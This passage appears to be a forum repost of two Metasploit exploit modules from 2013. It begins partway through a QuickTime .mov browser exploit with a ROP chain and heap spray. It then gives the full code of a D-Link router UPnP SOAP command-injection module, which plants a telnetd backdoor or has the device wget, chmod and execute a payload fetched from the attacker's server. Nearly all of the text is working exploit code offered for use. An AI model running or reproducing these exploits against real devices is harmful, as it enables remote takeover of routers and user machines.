    sprayHeap({shellcode:s});
    </script>
    </head>
    <body>
    <embed src="#{get_resource}/#{fake_mov_name}" width="0" height="0"></embed>
    </body>
    </html>
    |
  
    html.gsub(/^\t\t/, '')
  end
  
  
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    print_status("Requesting: #{request.uri}")
  
    unless targetable?(agent)
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end
  
    print_status("Target selected as: #{target.name}") if target
  
    if request.uri =~ /\.mov$/
      print_status("Sending specially crafted .mov file")
      send_response(cli, @exploit, { 'Content-Type' => 'application/octet-stream' })
    else
      html = get_html(target)
      send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
    end
  end
  
  def sort_bytes(data)
    data.map { |e| [e].pack('N').scan(/../).reverse.join }.join
  end
  
  def rop_nop(t)
    [t['Nop']].pack('V*')                    # Ret (QuickTime.qts)
  end
  
  def exploit
    buf = ''
    buf << rand_text_alpha(467)              # 467 to align the pivot
    10.times {
      buf << rop_nop(target)
    }
    buf << [
      target['Pop'],                       # POP ESP; RET (QuickTime.qts)
      0x20302020                           # Target value for ESP (our ROP payload)
    ].pack('V*')
    buf << rand_text_alpha(611 - buf.length) # Offset 611 to hit SE Handler
    buf << sort_bytes([target.ret])          # ADD ESP,280; RET (QuickTime.qts) - pivot
    buf << rand_text_alpha(658 - buf.length) # 658 bytes to pad up the mov file size
  
    # Quicktime File Format Specifications:
    # https://developer.apple.com/standards/qtff-2001.pdf
    mov  = "\x00\x00\x06\xDF"                # File size
    mov << "moov"                            # Movie atom
    mov << "\x00\x00\x06\xD7"                # size (1751d)
    mov << "rmra"                            # Reference Movie atom
    mov << "\x00\x00\x06\xCF"                # size (1743d)
    mov << "rmda"                            # rmda atom
    mov << "\x00\x00\x06\xBF"                # size (1727d)
    mov << "rdrf"                            # Data reference atom
    mov << "\x00\x00\x00\x00"                # size set to 0
    mov << "alis"                            # Data reference type: FS alias record
    mov << "\x00\x00\x06\xAA"                # Size (1706d)
    mov << rand_text_alpha(8)
    mov << "\x00\x00\x06\x61"                # Size (1633d)
    mov << rand_text_alpha(38)
    mov << "\x12"
    mov << rand_text_alpha(81)
    mov << "\xFF\xFF"
    mov << rand_text_alpha(18)
    mov << "\x00\x08"                        # Size (8d)
    mov << rand_text_alpha(8)
    mov << "\x00\x00"
    mov << "\x00\x08"                        # Size (8d)
    mov << rand_text_alpha(8)
    mov << "\x00\x00"
    mov << "\x00\x26"                        # Size (38d)
    mov << rand_text_alpha(38)
    mov << "\x00\x0F\x00\x0E"
    mov << "AA"                              # Size (must be invalid)
    mov << rand_text_alpha(12)
    mov << "\x00\x12\x00\x21"
    mov << rand_text_alpha(36)
    mov << "\x00"
    mov << "\x0F\x33"
    mov << rand_text_alpha(17)
    mov << "\x02\xF4"                        # Size (756h)
    mov << rand_text_alpha(756)
    mov << "\xFF\xFF\x00\x00\x00"
    mov << buf
  
    @exploit = mov
    super
  end
end
 
# 4D2AD396F772CE72   1337day.com [2013-07-23]   6E843BECFA50963C #

Добавлено в [time]1374566458[/time]
D-Link Devices UPnP SOAP Command Execution Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Auxiliary::CommandShell
 
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'D-Link Devices UPnP SOAP Command Execution',
      'Description' => %q{
        Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP
        interface. Since it is a blind OS command injection vulnerability, there is no
        output for the executed command when using the CMD target. Additionally, two targets
        are included, to start a telnetd service and establish a session over it, or deploy a
        native mipsel payload. This module has been tested successfully on DIR-300, DIR-600,
        DIR-645, DIR-845 and DIR-865. According to the vulnerability discoverer,
        more D-Link devices may affected.
      },
      'Author'      =>
        [
          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
          'juan vazquez' # minor help with msf module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'OSVDB', '94924' ],
          [ 'BID', '61005' ],
          [ 'EDB', '26664' ],
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-020' ]
        ],
      'DisclosureDate' => 'Jul 05 2013',
      'Privileged'     => true,
      'Platform'       => ['linux','unix'],
      'Payload'        =>
        {
          'DisableNops' => true,
        },
      'Targets'        =>
        [
          [ 'CMD',  #all devices
            {
            'Arch' => ARCH_CMD,
            'Platform' => 'unix'
            }
          ],
          [ 'Telnet',  #all devices - default target
            {
            'Arch' => ARCH_CMD,
            'Platform' => 'unix'
            }
          ],
          [ 'Linux mipsel Payload',  #DIR-865, DIR-645 and others with wget installed
            {
            'Arch' => ARCH_MIPSLE,
            'Platform' => 'linux'
            }
          ],
        ],
      'DefaultTarget'  => 1
      ))
 
    register_options(
      [
        Opt::RPORT(49152),  #port of UPnP SOAP webinterface
        OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),
      ], self.class)
  end
 
  def exploit
    @new_portmapping_descr = rand_text_alpha(8)
    @new_external_port = rand(65535)
    @new_internal_port = rand(65535)
 
    if target.name =~ /CMD/
      exploit_cmd
    elsif target.name =~ /Telnet/
      exploit_telnet
    else
      exploit_mips
    end
  end
 
  def exploit_cmd
    if not (datastore['CMD'])
      fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
    end
    cmd = payload.encoded
    type = "add"
    res = request(cmd, type)
    if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
    end
    print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
    type = "delete"
    res = request(cmd, type)
    if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
    end
    return
  end
 
  def exploit_telnet
    telnetport = rand(65535)
 
    vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
 
    cmd = "telnetd -p #{telnetport}"
    type = "add"
    res = request(cmd, type)
    if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
    end
    type = "delete"
    res = request(cmd, type)
    if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
    end
 
    begin
      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
 
      if sock
        print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...")
        add_socket(sock)
      else
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
      end
 
      print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}"
      auth_info = {
        :host   => rhost,
        :port   => telnetport,
        :sname => 'telnet',
        :user   => "",
        :pass  => "",
        :source_type => "exploit",
        :active => true
      }
      report_auth_info(auth_info)
      merge_me = {
        'USERPASS_FILE' => nil,
        'USER_FILE'     => nil,
        'PASS_FILE'     => nil,
        'USERNAME'      => nil,
        'PASSWORD'      => nil
      }
      start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
    rescue
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
    end
    return
  end
 
  def exploit_mips
 
    downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
 
    #thx to Juan for his awesome work on the mipsel elf support
    @pl = generate_payload_exe
    @elf_sent = false
 
    #
    # start our server
    #
    resource_uri = '/' + downfile
 
    if (datastore['DOWNHOST'])
      service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
    else
      #do not use SSL
      if datastore['SSL']
        ssl_restore = true
        datastore['SSL'] = false
      end
 
      #we use SRVHOST as download IP for the coming wget command.
      #SRVHOST needs a real IP address of our download host
      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
        srv_host = Rex::Socket.source_address(rhost)
      else
        srv_host = datastore['SRVHOST']
      end
 
      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
 
      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
      start_service({'Uri' => {
        'Proc' => Proc.new { |cli, req|
          on_request_uri(cli, req)
        },
        'Path' => resource_uri
      }})
 
      datastore['SSL'] = true if ssl_restore
    end
 
    #
    # download payload
    #
    print_status("#{rhost}:#{rport} - Asking the DLink device to take and execute #{service_url}")
    #this filename is used to store the payload on the device
    filename = rand_text_alpha_lower(8)
 
    cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; /tmp/#{filename}"
    type = "add"
    res = request(cmd, type)
    if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
    end
 
    # wait for payload download
    if (datastore['DOWNHOST'])
      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the DLink device to download the payload")
      select(nil, nil, nil, datastore['HTTP_DELAY'])
    else
      wait_linux_payload
    end
 
    register_file_for_cleanup("/tmp/#{filename}")
 
    type = "delete"
    res = request(cmd, type)
    if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
    end
  end
 
  def request(cmd, type)
 
    uri = '/soap.cgi'
 
    data_cmd = "<?xml version=\"1.0\"?>"
    data_cmd << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
    data_cmd << "<SOAP-ENV:Body>"
 
    if type == "add"
      vprint_status("#{rhost}:#{rport} - adding portmapping")
 
      soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
 
      data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
      data_cmd << "<NewPortMappingDescription>#{@new_portmapping_descr}</NewPortMappingDescription>"
      data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
      data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
      data_cmd << "<NewEnabled>1</NewEnabled>"
      data_cmd << "<NewExternalPort>#{@new_external_port}</NewExternalPort>"
      data_cmd << "<NewRemoteHost></NewRemoteHost>"
      data_cmd << "<NewProtocol>TCP</NewProtocol>"
      data_cmd << "<NewInternalPort>#{@new_internal_port}</NewInternalPort>"
      data_cmd << "</m:AddPortMapping>"
    else
      #we should clean it up ... otherwise we are not able to exploit it multiple times
      vprint_status("#{rhost}:#{rport} - deleting portmapping")
      soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
 
      data_cmd << "<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
      data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{@new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
      data_cmd << "</m:DeletePortMapping>"
    end
 
    data_cmd << "</SOAP-ENV:Body>"
    data_cmd << "</SOAP-ENV:Envelope>"
 
    begin
      res = send_request_cgi({
        'uri'    => uri,
        'vars_get' => {
          'service' => 'WANIPConn1'
        },
        'ctype' => "text/xml",
        'method' => 'POST',
        'headers' => {
          'SOAPAction' => soapaction,
          },
        'data' => data_cmd
      })
    return res
    rescue ::Rex::ConnectionError
      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
      return nil
    end
  end
 
  # Handle incoming requests from the server
  def on_request_uri(cli, request)
    #print_status("on_request_uri called: #{request.inspect}")
    if (not @pl)
      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
      return
    end
    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
    @elf_sent = true
    send_response(cli, @pl)
  end
 
  # wait for the data to be sent
  def wait_linux_payload
    print_status("#{rhost}:#{rport} - Waiting for the target to request the ELF payload...")
 
    waited = 0
    while (not @elf_sent)
      select(nil, nil, nil, 1)
      waited += 1
      if (waited > datastore['HTTP_DELAY'])
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it can't connect back to us?")
      end
    end
  end
end
 
# 948A2E3AC38F86BF   1337day.com [2013-07-23]   59E70CF438C4A7BF #